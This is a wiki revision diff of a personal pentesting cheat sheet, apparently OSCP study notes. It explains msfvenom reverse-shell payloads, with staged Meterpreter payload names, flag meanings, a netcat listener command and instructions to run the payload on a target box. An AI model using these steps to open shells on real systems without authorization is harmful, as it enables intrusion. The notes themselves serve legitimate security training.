The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools


cheat_sheets_various

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
cheat_sheets_various [2024/02/04 02:49] – [Reverse Shell Payload] gmancheat_sheets_various [2024/02/04 03:05] (current) – [net commands (Windows)] gman
Line 322: Line 322:
 ===== msfvenom ===== ===== msfvenom =====
  
-==== Reverse Shell Payload ==== +To see the available payloads: ''msfvenom -l payloads'' (filter by piping to grep)
- +
-To see the available payloads: ''msfvenom -l payloads'' +
-  * Filter by piping to grep+
   * [[https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ | Cheat Sheet]]   * [[https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ | Cheat Sheet]]
  
-First, build a payload with MSFVenom:+First, build a payload with MSFVenom (e.g., a reverse shell payload):
  
 <code> <code>
Line 335: Line 332:
  
 # -p    = payload # -p    = payload
-# LHOST = our local host IP address (this is your machine's IP address) +# LHOST = local host IP address (this is your machine's IP address) 
-# LPORT = the port to listen on (this is the port on your machine)+# LPORT = local port to listen on (this is the port on your machine)
 # -f    = format (of the output) # -f    = format (of the output)
 # R     = export the payload in raw format # R     = export the payload in raw format
Line 342: Line 339:
  
 A **staged** payload will follow this syntax (note the delimiter):  A **staged** payload will follow this syntax (note the delimiter): 
-  * ''windows/x64/meterpreter/reverse_tcp' +  * ''windows/x64/meterpreter/reverse_tcp'
-  * ''linux/x86/meterpreter/reverse_tcp'+  * ''linux/x86/meterpreter/reverse_tcp''
      
 A **non-staged** payload will follow this syntax:  A **non-staged** payload will follow this syntax: 
Line 351: Line 348:
 After that set up a listener on your attach machine:  After that set up a listener on your attach machine: 
  
-<code>nc -nvvlp [listening port]</code>+<code>nc -nvlp [listening port]</code>
  
 Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.  Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine. 
Line 357: Line 354:
 ---- ----
  
-==== Notes ====+===== net commands (Windows) =====
  
-**To-Do:** https://www.reddit.com/r/oscp/comments/ixmqp0/msfvenom/+stuff 
 +
 +----
  
-**Source:** https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ 
- 
-**Advice:** I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom. 
- 
-**Additional:** 
-  * msfvenom cheatsheet: https://netsec.ws/?p=331 
-  * To see all available payloads: ''msfvenom -l payloads'' 
- 
----- 
  
 ===== ping ===== ===== ping =====
cheat_sheets_various.1707014957.txt.gz · Last modified: by gman